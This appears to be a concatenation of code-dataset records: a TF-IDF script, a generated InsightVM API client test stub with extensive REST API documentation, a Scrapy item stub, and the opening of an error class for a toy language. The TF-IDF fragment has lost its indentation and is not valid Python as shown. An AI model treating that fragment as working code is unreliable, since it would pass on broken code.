stop_words = set({}.fromkeys([line.strip() for line in open('../data/stopword.txt')]))
data = {}
all_file = []
with open(path) as file:
all_data = csv.reader(file)
count = 0
for i in all_data:
if count == 0:
count = 1
continue
if i[5] == '':
continue
tmp = i[7]
tmp = re.sub(r'[^a-zA-Z]', ' ', tmp)
words = tmp.lower().split()
words = [w for w in words if w not in stop_words]
try:
data[int(float(i[5]))].append(' '.join(words))
except KeyError:
data[int(float(i[5]))] = [' '.join(words)]
all_file.append(' '.join(words))
count += 1
vectorizer = CountVectorizer(decode_error='replace', max_features=10000)
vectorizer.fit(all_file)
vocab = {}.fromkeys(vectorizer.get_feature_names())
idf = {}
for line in all_file:
line = line.split(' ')
line = set(line)
for word in line:
try:
a = vocab[word]
try:
idf[word] += 1
except KeyError:
idf[word] = 1
except KeyError:
continue
total_file = len(all_file)
for i in idf.keys():
idf[i] = math.log(total_file / idf[i])
idf = sorted(idf.items(), key=lambda x: x[1], reverse=True)
with open('../tf_idf/idf.txt', 'w') as file:
for i in idf:
file.write(i[0] + "\t" + str(i[1]) + '\n')
for key in data.keys():
count = 0
tf = {}
for line in data[key]:
line = line.split(' ')
count += len(line)
for word in line:
try:
a = vocab[word]
try:
tf[word] += 1
except KeyError:
tf[word] = 1
except KeyError:
continue
for i in tf.keys():
tf[i] = tf[i] / count
tf = sorted(tf.items(), key=lambda x: x[1], reverse=True)
with open('../tf_idf/tf' + str(key) + '.txt', 'w') as file:
for i in tf:
file.write(i[0] + "\t" + str(i[1]) + '\n')
| [
"yuangliu@YuangLiudeMacBook-Pro.local"
] | yuangliu@YuangLiudeMacBook-Pro.local |
b1b5d4c9662f948f6cb0351194e8af4c4eab7524 | acc9d729e0182b17023e9660457eed0e19f4f828 | /test/test_exception_scope.py | 22945ab9e2fae2a05406475b22a8ad88e8dbef90 | [] | no_license | secuwave/nexpose_client | 2f00907ef3ffea33c8e9f5cc2543e708f349de6c | 5ceff219ae03cadb5407dc48d8858ffa56bb3463 | refs/heads/master | 2020-05-22T13:54:22.675479 | 2019-05-13T09:12:09 | 2019-05-13T09:12:09 | 186,369,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,879 | py | # coding: utf-8
"""
InsightVM API
# Overview This guide documents the InsightVM Application Programming Interface (API) Version 3. This API supports the Representational State Transfer (REST) design pattern. Unless noted otherwise this API accepts and produces the `application/json` media type. This API uses Hypermedia as the Engine of Application State (HATEOAS) and is hypermedia friendly. All API connections must be made to the security console using HTTPS. ## Versioning Versioning is specified in the URL and the base path of this API is: `https://<host>:<port>/api/3/`. ## Specification An <a target=\"_blank\" href=\"https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md\">OpenAPI v2</a> specification (also known as Swagger 2) of this API is available. Tools such as <a target=\"_blank\" href=\"https://github.com/swagger-api/swagger-codegen\">swagger-codegen</a> can be used to generate an API client in the language of your choosing using this specification document. <p class=\"openapi\">Download the specification: <a class=\"openapi-button\" target=\"_blank\" download=\"\" href=\"api.json\"> Download </a></p> ## Authentication Authorization to the API uses HTTP Basic Authorization (see <a target=\"_blank\" href=\"https://www.ietf.org/rfc/rfc2617.txt\">RFC 2617</a> for more information). Requests must supply authorization credentials in the `Authorization` header using the Base64 encoding of `\"username:password\"`. <!-- ReDoc-Inject: <security-definitions> --> ### 2FA This API supports two-factor authentication (2FA) by supplying an authentication token in addition to the Basic Authorization. The token is specified using the `Token` request header. To leverage two-factor authentication, this must be enabled on the console and be configured for the account accessing the API. ## Resources ### Naming Resource names represent nouns and identify the entity being manipulated or accessed. 
All collection resources are pluralized to indicate to the client they are interacting with a collection of multiple resources of the same type. Singular resource names are used when there exists only one resource available to interact with. The following naming conventions are used by this API: | Type | Case | | --------------------------------------------- | ------------------------ | | Resource names | `lower_snake_case` | | Header, body, and query parameters parameters | `camelCase` | | JSON fields and property names | `camelCase` | #### Collections A collection resource is a parent resource for instance resources, but can itself be retrieved and operated on independently. Collection resources use a pluralized resource name. The resource path for collection resources follow the convention: ``` /api/3/{resource_name} ``` #### Instances An instance resource is a \"leaf\" level resource that may be retrieved, optionally nested within a collection resource. Instance resources are usually retrievable with opaque identifiers. The resource path for instance resources follows the convention: ``` /api/3/{resource_name}/{instance_id}... ``` ## Verbs The following HTTP operations are supported throughout this API. The general usage of the operation and both its failure and success status codes are outlined below. | Verb | Usage | Success | Failure | | --------- | ------------------------------------------------------------------------------------- | ----------- | -------------------------------------------------------------- | | `GET` | Used to retrieve a resource by identifier, or a collection of resources by type. | `200` | `400`, `401`, `402`, `404`, `405`, `408`, `410`, `415`, `500` | | `POST` | Creates a resource with an application-specified identifier. | `201` | `400`, `401`, `404`, `405`, `408`, `413`, `415`, `500` | | `POST` | Performs a request to queue an asynchronous job. 
| `202` | `400`, `401`, `405`, `408`, `410`, `413`, `415`, `500` | | `PUT` | Creates a resource with a client-specified identifier. | `200` | `400`, `401`, `403`, `405`, `408`, `410`, `413`, `415`, `500` | | `PUT` | Performs a full update of a resource with a specified identifier. | `201` | `400`, `401`, `403`, `405`, `408`, `410`, `413`, `415`, `500` | | `DELETE` | Deletes a resource by identifier or an entire collection of resources. | `204` | `400`, `401`, `405`, `408`, `410`, `413`, `415`, `500` | | `OPTIONS` | Requests what operations are available on a resource. | `200` | `401`, `404`, `405`, `408`, `500` | ### Common Operations #### OPTIONS All resources respond to the `OPTIONS` request, which allows discoverability of available operations that are supported. The `OPTIONS` response returns the acceptable HTTP operations on that resource within the `Allow` header. The response is always a `200 OK` status. ### Collection Resources Collection resources can support the `GET`, `POST`, `PUT`, and `DELETE` operations. #### GET The `GET` operation invoked on a collection resource indicates a request to retrieve all, or some, of the entities contained within the collection. This also includes the optional capability to filter or search resources during the request. The response from a collection listing is a paginated document. See [hypermedia links](#section/Overview/Paging) for more information. #### POST The `POST` is a non-idempotent operation that allows for the creation of a new resource when the resource identifier is not provided by the system during the creation operation (i.e. the Security Console generates the identifier). The content of the `POST` request is sent in the request body. The response to a successful `POST` request should be a `201 CREATED` with a valid `Location` header field set to the URI that can be used to access to the newly created resource. The `POST` to a collection resource can also be used to interact with asynchronous resources. 
In this situation, instead of a `201 CREATED` response, the `202 ACCEPTED` response indicates that processing of the request is not fully complete but has been accepted for future processing. This request will respond similarly with a `Location` header with link to the job-oriented asynchronous resource that was created and/or queued. #### PUT The `PUT` is an idempotent operation that either performs a create with user-supplied identity, or a full replace or update of a resource by a known identifier. The response to a `PUT` operation to create an entity is a `201 Created` with a valid `Location` header field set to the URI that can be used to access to the newly created resource. `PUT` on a collection resource replaces all values in the collection. The typical response to a `PUT` operation that updates an entity is hypermedia links, which may link to related resources caused by the side-effects of the changes performed. #### DELETE The `DELETE` is an idempotent operation that physically deletes a resource, or removes an association between resources. The typical response to a `DELETE` operation is hypermedia links, which may link to related resources caused by the side-effects of the changes performed. ### Instance Resources Instance resources can support the `GET`, `PUT`, `POST`, `PATCH` and `DELETE` operations. #### GET Retrieves the details of a specific resource by its identifier. The details retrieved can be controlled through property selection and property views. The content of the resource is returned within the body of the response in the acceptable media type. #### PUT Allows for and idempotent \"full update\" (complete replacement) on a specific resource. If the resource does not exist, it will be created; if it does exist, it is completely overwritten. Any omitted properties in the request are assumed to be undefined/null. For \"partial updates\" use `POST` or `PATCH` instead. The content of the `PUT` request is sent in the request body. 
The identifier of the resource is specified within the URL (not the request body). The response to a successful `PUT` request is a `201 CREATED` to represent the created status, with a valid `Location` header field set to the URI that can be used to access to the newly created (or fully replaced) resource. #### POST Performs a non-idempotent creation of a new resource. The `POST` of an instance resource most commonly occurs with the use of nested resources (e.g. searching on a parent collection resource). The response to a `POST` of an instance resource is typically a `200 OK` if the resource is non-persistent, and a `201 CREATED` if there is a resource created/persisted as a result of the operation. This varies by endpoint. #### PATCH The `PATCH` operation is used to perform a partial update of a resource. `PATCH` is a non-idempotent operation that enforces an atomic mutation of a resource. Only the properties specified in the request are to be overwritten on the resource it is applied to. If a property is missing, it is assumed to not have changed. #### DELETE Permanently removes the individual resource from the system. If the resource is an association between resources, only the association is removed, not the resources themselves. A successful deletion of the resource should return `204 NO CONTENT` with no response body. This operation is not fully idempotent, as follow-up requests to delete a non-existent resource should return a `404 NOT FOUND`. ## Requests Unless otherwise indicated, the default request body media type is `application/json`. ### Headers Commonly used request headers include: | Header | Example | Purpose | | ------------------ | --------------------------------------------- | ---------------------------------------------------------------------------------------------- | | `Accept` | `application/json` | Defines what acceptable content types are allowed by the client. For all types, use `*/*`. 
| | `Accept-Encoding` | `deflate, gzip` | Allows for the encoding to be specified (such as gzip). | | `Accept-Language` | `en-US` | Indicates to the server the client's locale (defaults `en-US`). | | `Authorization ` | `Basic Base64(\"username:password\")` | Basic authentication | | `Token ` | `123456` | Two-factor authentication token (if enabled) | ### Dates & Times Dates and/or times are specified as strings in the ISO 8601 format(s). The following formats are supported as input: | Value | Format | Notes | | --------------------------- | ------------------------------------------------------ | ----------------------------------------------------- | | Date | YYYY-MM-DD | Defaults to 12 am UTC (if used for a date & time | | Date & time only | YYYY-MM-DD'T'hh:mm:ss[.nnn] | Defaults to UTC | | Date & time in UTC | YYYY-MM-DD'T'hh:mm:ss[.nnn]Z | | | Date & time w/ offset | YYYY-MM-DD'T'hh:mm:ss[.nnn][+|-]hh:mm | | | Date & time w/ zone-offset | YYYY-MM-DD'T'hh:mm:ss[.nnn][+|-]hh:mm[<zone-id>] | | ### Timezones Timezones are specified in the regional zone format, such as `\"America/Los_Angeles\"`, `\"Asia/Tokyo\"`, or `\"GMT\"`. ### Paging Pagination is supported on certain collection resources using a combination of two query parameters, `page` and `size`. As these are control parameters, they are prefixed with the underscore character. The page parameter dictates the zero-based index of the page to retrieve, and the `size` indicates the size of the page. For example, `/resources?page=2&size=10` will return page 3, with 10 records per page, giving results 21-30. The maximum page size for a request is 500. ### Sorting Sorting is supported on paginated resources with the `sort` query parameter(s). The sort query parameter(s) supports identifying a single or multi-property sort with a single or multi-direction output. The format of the parameter is: ``` sort=property[,ASC|DESC]... 
``` Therefore, the request `/resources?sort=name,title,DESC` would return the results sorted by the name and title descending, in that order. The sort directions are either ascending `ASC` or descending `DESC`. With single-order sorting, all properties are sorted in the same direction. To sort the results with varying orders by property, multiple sort parameters are passed. For example, the request `/resources?sort=name,ASC&sort=title,DESC` would sort by name ascending and title descending, in that order. ## Responses The following response statuses may be returned by this API. | Status | Meaning | Usage | | ------ | ------------------------ |------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `200` | OK | The operation performed without error according to the specification of the request, and no more specific 2xx code is suitable. | | `201` | Created | A create request has been fulfilled and a resource has been created. The resource is available as the URI specified in the response, including the `Location` header. | | `202` | Accepted | An asynchronous task has been accepted, but not guaranteed, to be processed in the future. | | `400` | Bad Request | The request was invalid or cannot be otherwise served. The request is not likely to succeed in the future without modifications. | | `401` | Unauthorized | The user is unauthorized to perform the operation requested, or does not maintain permissions to perform the operation on the resource specified. | | `403` | Forbidden | The resource exists to which the user has access, but the operating requested is not permitted. | | `404` | Not Found | The resource specified could not be located, does not exist, or an unauthenticated client does not have permissions to a resource. | | `405` | Method Not Allowed | The operations may not be performed on the specific resource. 
Allowed operations are returned and may be performed on the resource. | | `408` | Request Timeout | The client has failed to complete a request in a timely manner and the request has been discarded. | | `413` | Request Entity Too Large | The request being provided is too large for the server to accept processing. | | `415` | Unsupported Media Type | The media type is not supported for the requested resource. | | `500` | Internal Server Error | An internal and unexpected error has occurred on the server at no fault of the client. | ### Security The response statuses 401, 403 and 404 need special consideration for security purposes. As necessary, error statuses and messages may be obscured to strengthen security and prevent information exposure. The following is a guideline for privileged resource response statuses: | Use Case | Access | Resource | Permission | Status | | ------------------------------------------------------------------ | ------------------ |------------------- | ------------ | ------------ | | Unauthenticated access to an unauthenticated resource. | Unauthenticated | Unauthenticated | Yes | `20x` | | Unauthenticated access to an authenticated resource. | Unauthenticated | Authenticated | No | `401` | | Unauthenticated access to an authenticated resource. | Unauthenticated | Non-existent | No | `401` | | Authenticated access to a unauthenticated resource. | Authenticated | Unauthenticated | Yes | `20x` | | Authenticated access to an authenticated, unprivileged resource. | Authenticated | Authenticated | No | `404` | | Authenticated access to an authenticated, privileged resource. 
| Authenticated | Authenticated | Yes | `20x` | | Authenticated access to an authenticated, non-existent resource | Authenticated | Non-existent | Yes | `404` | ### Headers Commonly used response headers include: | Header | Example | Purpose | | -------------------------- | --------------------------------- | --------------------------------------------------------------- | | `Allow` | `OPTIONS, GET` | Defines the allowable HTTP operations on a resource. | | `Cache-Control` | `no-store, must-revalidate` | Disables caching of resources (as they are all dynamic). | | `Content-Encoding` | `gzip` | The encoding of the response body (if any). | | `Location` | | Refers to the URI of the resource created by a request. | | `Transfer-Encoding` | `chunked` | Specified the encoding used to transform response. | | `Retry-After` | 5000 | Indicates the time to wait before retrying a request. | | `X-Content-Type-Options` | `nosniff` | Disables MIME type sniffing. | | `X-XSS-Protection` | `1; mode=block` | Enables XSS filter protection. | | `X-Frame-Options` | `SAMEORIGIN` | Prevents rendering in a frame from a different origin. | | `X-UA-Compatible` | `IE=edge,chrome=1` | Specifies the browser mode to render in. | ### Format When `application/json` is returned in the response body it is always pretty-printed (indented, human readable output). Additionally, gzip compression/encoding is supported on all responses. #### Dates & Times Dates or times are returned as strings in the ISO 8601 'extended' format. When a date and time is returned (instant) the value is converted to UTC. For example: | Value | Format | Example | | --------------- | ------------------------------ | --------------------- | | Date | `YYYY-MM-DD` | 2017-12-03 | | Date & Time | `YYYY-MM-DD'T'hh:mm:ss[.nnn]Z` | 2017-12-03T10:15:30Z | #### Content In some resources a Content data type is used. This allows for multiple formats of representation to be returned within resource, specifically `\"html\"` and `\"text\"`. 
The `\"text\"` property returns a flattened representation suitable for output in textual displays. The `\"html\"` property returns an HTML fragment suitable for display within an HTML element. Note, the HTML returned is not a valid stand-alone HTML document. #### Paging The response to a paginated request follows the format: ```json { resources\": [ ... ], \"page\": { \"number\" : ..., \"size\" : ..., \"totalResources\" : ..., \"totalPages\" : ... }, \"links\": [ \"first\" : { \"href\" : \"...\" }, \"prev\" : { \"href\" : \"...\" }, \"self\" : { \"href\" : \"...\" }, \"next\" : { \"href\" : \"...\" }, \"last\" : { \"href\" : \"...\" } ] } ``` The `resources` property is an array of the resources being retrieved from the endpoint, each which should contain at minimum a \"self\" relation hypermedia link. The `page` property outlines the details of the current page and total possible pages. The object for the page includes the following properties: - number - The page number (zero-based) of the page returned. - size - The size of the pages, which is less than or equal to the maximum page size. - totalResources - The total amount of resources available across all pages. - totalPages - The total amount of pages. The last property of the paged response is the `links` array, which contains all available hypermedia links. For paginated responses, the \"self\", \"next\", \"previous\", \"first\", and \"last\" links are returned. The \"self\" link must always be returned and should contain a link to allow the client to replicate the original request against the collection resource in an identical manner to that in which it was invoked. The \"next\" and \"previous\" links are present if either or both there exists a previous or next page, respectively. The \"next\" and \"previous\" links have hrefs that allow \"natural movement\" to the next page, that is all parameters required to move the next page are provided in the link. 
The \"first\" and \"last\" links provide references to the first and last pages respectively. Requests outside the boundaries of the pageable will result in a `404 NOT FOUND`. Paginated requests do not provide a \"stateful cursor\" to the client, nor does it need to provide a read consistent view. Records in adjacent pages may change while pagination is being traversed, and the total number of pages and resources may change between requests within the same filtered/queries resource collection. #### Property Views The \"depth\" of the response of a resource can be configured using a \"view\". All endpoints supports two views that can tune the extent of the information returned in the resource. The supported views are `summary` and `details` (the default). View are specified using a query parameter, in this format: ```bash /<resource>?view={viewName} ``` #### Error Any error responses can provide a response body with a message to the client indicating more information (if applicable) to aid debugging of the error. All 40x and 50x responses will return an error response in the body. The format of the response is as follows: ```json { \"status\": <statusCode>, \"message\": <message>, \"links\" : [ { \"rel\" : \"...\", \"href\" : \"...\" } ] } ``` The `status` property is the same as the HTTP status returned in the response, to ease client parsing. The message property is a localized message in the request client's locale (if applicable) that articulates the nature of the error. The last property is the `links` property. This may contain additional [hypermedia links](#section/Overview/Authentication) to troubleshoot. #### Search Criteria <a section=\"section/Responses/SearchCriteria\"></a> Multiple resources make use of search criteria to match assets. Search criteria is an array of search filters. 
Each search filter has a generic format of: ```json { \"field\": \"<field-name>\", \"operator\": \"<operator>\", [\"value\": \"<value>\",] [\"lower\": \"<value>\",] [\"upper\": \"<value>\"] } ``` Every filter defines two required properties `field` and `operator`. The field is the name of an asset property that is being filtered on. The operator is a type and property-specific operating performed on the filtered property. The valid values for fields and operators are outlined in the table below. Every filter also defines one or more values that are supplied to the operator. The valid values vary by operator and are outlined below. ##### Fields The following table outlines the search criteria fields and the available operators: | Field | Operators | | --------------------------------- | ------------------------------------------------------------------------------------------------------------------------------ | | `alternate-address-type` | `in` | | `container-image` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is like` ` not like` | | `container-status` | `is` ` is not` | | `containers` | `are` | | `criticality-tag` | `is` ` is not` ` is greater than` ` is less than` ` is applied` ` is not applied` | | `custom-tag` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is applied` ` is not applied` | | `cve` | `is` ` is not` ` contains` ` does not contain` | | `cvss-access-complexity` | `is` ` is not` | | `cvss-authentication-required` | `is` ` is not` | | `cvss-access-vector` | `is` ` is not` | | `cvss-availability-impact` | `is` ` is not` | | `cvss-confidentiality-impact` | `is` ` is not` | | `cvss-integrity-impact` | `is` ` is not` | | `cvss-v3-confidentiality-impact` | `is` ` is not` | | `cvss-v3-integrity-impact` | `is` ` is not` | | `cvss-v3-availability-impact` | `is` ` is not` | | `cvss-v3-attack-vector` | `is` ` is not` | | `cvss-v3-attack-complexity` | `is` ` is not` | | `cvss-v3-user-interaction` 
| `is` ` is not` | | `cvss-v3-privileges-required` | `is` ` is not` | | `host-name` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is empty` ` is not empty` ` is like` ` not like` | | `host-type` | `in` ` not in` | | `ip-address` | `is` ` is not` ` in range` ` not in range` ` is like` ` not like` | | `ip-address-type` | `in` ` not in` | | `last-scan-date` | `is-on-or-before` ` is on or after` ` is between` ` is earlier than` ` is within the last` | | `location-tag` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is applied` ` is not applied` | | `mobile-device-last-sync-time` | `is-within-the-last` ` is earlier than` | | `open-ports` | `is` ` is not` ` in range` | | `operating-system` | `contains` ` does not contain` ` is empty` ` is not empty` | | `owner-tag` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is applied` ` is not applied` | | `pci-compliance` | `is` | | `risk-score` | `is` ` is not` ` in range` ` greater than` ` less than` | | `service-name` | `contains` ` does not contain` | | `site-id` | `in` ` not in` | | `software` | `contains` ` does not contain` | | `vAsset-cluster` | `is` ` is not` ` contains` ` does not contain` ` starts with` | | `vAsset-datacenter` | `is` ` is not` | | `vAsset-host-name` | `is` ` is not` ` contains` ` does not contain` ` starts with` | | `vAsset-power-state` | `in` ` not in` | | `vAsset-resource-pool-path` | `contains` ` does not contain` | | `vulnerability-assessed` | `is-on-or-before` ` is on or after` ` is between` ` is earlier than` ` is within the last` | | `vulnerability-category` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` | | `vulnerability-cvss-v3-score` | `is` ` is not` | | `vulnerability-cvss-score` | `is` ` is not` ` in range` ` is greater than` ` is less than` | | `vulnerability-exposures` | `includes` ` does not include` | | `vulnerability-title` | `contains` ` does not contain` ` is` 
` is not` ` starts with` ` ends with` | | `vulnerability-validated-status` | `are` | ##### Enumerated Properties The following fields have enumerated values: | Field | Acceptable Values | | ----------------------------------------- | ------------------------------------------------------------------------------------------------------------- | | `alternate-address-type` | 0=IPv4, 1=IPv6 | | `containers` | 0=present, 1=not present | | `container-status` | `created` `running` `paused` `restarting` `exited` `dead` `unknown` | | `cvss-access-complexity` | <ul><li><code>L</code> = Low</li><li><code>M</code> = Medium</li><li><code>H</code> = High</li></ul> | | `cvss-integrity-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-confidentiality-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-availability-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-access-vector` | <ul><li><code>L</code> = Local</li><li><code>A</code> = Adjacent</li><li><code>N</code> = Network</li></ul> | | `cvss-authentication-required` | <ul><li><code>N</code> = None</li><li><code>S</code> = Single</li><li><code>M</code> = Multiple</li></ul> | | `cvss-v3-confidentiality-impact` | <ul><li><code>L</code> = Local</li><li><code>L</code> = Low</li><li><code>N</code> = None</li><li><code>H</code> = High</li></ul> | | `cvss-v3-integrity-impact` | <ul><li><code>L</code> = Local</li><li><code>L</code> = Low</li><li><code>N</code> = None</li><li><code>H</code> = High</li></ul> | | `cvss-v3-availability-impact` | <ul><li><code>N</code> = None</li><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `cvss-v3-attack-vector` | <ul><li><code>N</code> = Network</li><li><code>A</code> = Adjacent</li><li><code>L</code> = Local</li><li><code>P</code> = Physical</li></ul> | | 
`cvss-v3-attack-complexity` | <ul><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `cvss-v3-user-interaction` | <ul><li><code>N</code> = None</li><li><code>R</code> = Required</li></ul> | | `cvss-v3-privileges-required` | <ul><li><code>N</code> = None</li><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `host-type` | 0=Unknown, 1=Guest, 2=Hypervisor, 3=Physical, 4=Mobile | | `ip-address-type` | 0=IPv4, 1=IPv6 | | `pci-compliance` | 0=fail, 1=pass | | `vulnerability-validated-status` | 0=present, 1=not present | ##### Operator Properties <a section=\"section/Responses/SearchCriteria/OperatorProperties\"></a> The following table outlines which properties are required for each operator and the appropriate data type(s): | Operator | `value` | `lower` | `upper` | | ----------------------|-----------------------|-----------------------|-----------------------| | `are` | `string` | | | | `contains` | `string` | | | | `does-not-contain` | `string` | | | | `ends with` | `string` | | | | `in` | `Array[ string ]` | | | | `in-range` | | `numeric` | `numeric` | | `includes` | `Array[ string ]` | | | | `is` | `string` | | | | `is-applied` | | | | | `is-between` | | `numeric` | `numeric` | | `is-earlier-than` | `numeric` | | | | `is-empty` | | | | | `is-greater-than` | `numeric` | | | | `is-on-or-after` | `string` (yyyy-MM-dd) | | | | `is-on-or-before` | `string` (yyyy-MM-dd) | | | | `is-not` | `string` | | | | `is-not-applied` | | | | | `is-not-empty` | | | | | `is-within-the-last` | `string` | | | | `less-than` | `string` | | | | `like` | `string` | | | | `not-contains` | `string` | | | | `not-in` | `Array[ string ]` | | | | `not-in-range` | | `numeric` | `numeric` | | `not-like` | `string` | | | | `starts-with` | `string` | | | #### Discovery Connection Search Criteria <a section=\"section/Responses/DiscoverySearchCriteria\"></a> Dynamic sites make use of search criteria to match assets from a discovery connection. 
Search criteria is an array of search filters. Each search filter has a generic format of: ```json { \"field\": \"<field-name>\", \"operator\": \"<operator>\", [\"value\": \"<value>\",] [\"lower\": \"<value>\",] [\"upper\": \"<value>\"] } ``` Every filter defines two required properties `field` and `operator`. The field is the name of an asset property that is being filtered on. The list of supported fields vary depending on the type of discovery connection configured for the dynamic site (e.g vSphere, ActiveSync, etc.). The operator is a type and property-specific operating performed on the filtered property. The valid values for fields outlined in the tables below and are grouped by the type of connection. Every filter also defines one or more values that are supplied to the operator. See <a href=\"#section/Responses/SearchCriteria/OperatorProperties\">Search Criteria Operator Properties</a> for more information on the valid values for each operator. ##### Fields (ActiveSync) This section documents search criteria information for ActiveSync discovery connections. The discovery connections must be one of the following types: `\"activesync-ldap\"`, `\"activesync-office365\"`, or `\"activesync-powershell\"`. The following table outlines the search criteria fields and the available operators for ActiveSync connections: | Field | Operators | | --------------------------------- | ------------------------------------------------------------- | | `last-sync-time` | `is-within-the-last` ` is-earlier-than` | | `operating-system` | `contains` ` does-not-contain` | | `user` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (AWS) This section documents search criteria information for AWS discovery connections. The discovery connections must be the type `\"aws\"`. 
The following table outlines the search criteria fields and the available operators for AWS connections: | Field | Operators | | ----------------------- | ------------------------------------------------------------- | | `availability-zone` | `contains` ` does-not-contain` | | `guest-os-family` | `contains` ` does-not-contain` | | `instance-id` | `contains` ` does-not-contain` | | `instance-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `instance-state` | `in` ` not-in` | | `instance-type` | `in` ` not-in` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `region` | `in` ` not-in` | | `vpc-id` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (DHCP) This section documents search criteria information for DHCP discovery connections. The discovery connections must be the type `\"dhcp\"`. The following table outlines the search criteria fields and the available operators for DHCP connections: | Field | Operators | | --------------- | ------------------------------------------------------------- | | `host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `mac-address` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (Sonar) This section documents search criteria information for Sonar discovery connections. The discovery connections must be the type `\"sonar\"`. The following table outlines the search criteria fields and the available operators for Sonar connections: | Field | Operators | | ------------------- | -------------------- | | `search-domain` | `contains` ` is` | | `ip-address` | `in-range` ` is` | | `sonar-scan-date` | `is-within-the-last` | ##### Fields (vSphere) This section documents search criteria information for vSphere discovery connections. The discovery connections must be the type `\"vsphere\"`. 
The following table outlines the search criteria fields and the available operators for vSphere connections: | Field | Operators | | -------------------- | ------------------------------------------------------------------------------------------ | | `cluster` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `data-center` | `is` ` is-not` | | `discovered-time` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `guest-os-family` | `contains` ` does-not-contain` | | `host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `power-state` | `in` ` not-in` | | `resource-pool-path` | `contains` ` does-not-contain` | | `last-time-seen` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `vm` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Enumerated Properties (vSphere) The following fields have enumerated values: | Field | Acceptable Values | | ------------- | ------------------------------------ | | `power-state` | `poweredOn` `poweredOff` `suspended` | ## HATEOAS This API follows Hypermedia as the Engine of Application State (HATEOAS) principals and is therefore hypermedia friendly. Hyperlinks are returned in the `links` property of any given resource and contain a fully-qualified hyperlink to the corresponding resource. The format of the hypermedia link adheres to both the <a target=\"_blank\" href=\"http://jsonapi.org\">{json:api} v1</a> <a target=\"_blank\" href=\"http://jsonapi.org/format/#document-links\">\"Link Object\"</a> and <a target=\"_blank\" href=\"http://json-schema.org/latest/json-schema-hypermedia.html\">JSON Hyper-Schema</a> <a target=\"_blank\" href=\"http://json-schema.org/latest/json-schema-hypermedia.html#rfc.section.5.2\">\"Link Description Object\"</a> formats. 
For example: ```json \"links\": [{ \"rel\": \"<relation>\", \"href\": \"<href>\" ... }] ``` Where appropriate link objects may also contain additional properties than the `rel` and `href` properties, such as `id`, `type`, etc. See the [Root](#tag/Root) resources for the entry points into API discovery. # noqa: E501
OpenAPI spec version: 3
Contact: support@rapid7.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import nexpose_client
from nexpose_client.models.exception_scope import ExceptionScope # noqa: E501
from nexpose_client.rest import ApiException
class TestExceptionScope(unittest.TestCase):
    """Unit-test stubs for the generated ExceptionScope model."""

    def setUp(self):
        """No fixtures are needed for these stub tests."""
        pass

    def tearDown(self):
        """Nothing to clean up."""
        pass

    def testExceptionScope(self):
        """Test ExceptionScope"""
        # FIXME: construct object with mandatory attributes with example values
        # model = nexpose_client.models.exception_scope.ExceptionScope()  # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| [
"root@data-proc.openbase.co.kr"
] | root@data-proc.openbase.co.kr |
86a722adbfb0fe3c0a8f2b9fadf6b3ec83314056 | 52051c450645b30a677a2e5fbff98fcfb64ec517 | /CHTHCrawler/items.py | 005463f8b28ce958f4718a6e88364570d7410942 | [] | no_license | vinhtran1/CHTHCrawler | f5e1a633923f43fde0696a66e7fff884596036e8 | fddbb13a2c93a345e412baaec44dbbac03e46723 | refs/heads/main | 2023-05-10T21:04:58.701847 | 2021-03-04T06:55:36 | 2021-03-04T06:55:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | # Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class ChthcrawlerItem(scrapy.Item):
    """Item model for data scraped by the CHTH crawler spiders.

    No fields are declared yet; add ``scrapy.Field()`` class attributes as
    scraping targets are defined. See
    https://docs.scrapy.org/en/latest/topics/items.html
    """
    # define the fields for your item here like:
    # name = scrapy.Field()
    pass
| [
"15521020@gm.uit.edu.vn"
] | 15521020@gm.uit.edu.vn |
e4e6f6234474e6bc047f725e4bbf27761e2dbcc5 | 46d2f9652215e97ce2bf92d97b1dffaa7e44ba18 | /error.py | 483f1559f4eabda6b4e9117d3553fab7ab0220bc | [] | no_license | Breathleas/ToyPL | ed45ea4045fdb69e23938d8e4b572cf4ba57efb8 | f96ae7f6555ec9a55a9726944198c3a896bfac80 | refs/heads/master | 2023-03-30T08:29:37.488471 | 2021-04-07T06:54:14 | 2021-04-07T06:54:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,826 | py | from string_with_arrows import *
class Error(object):
    """Base class for interpreter errors that carry source-position info.

    Attributes:
        pos_start: position where the erroneous span starts (has ``fn``,
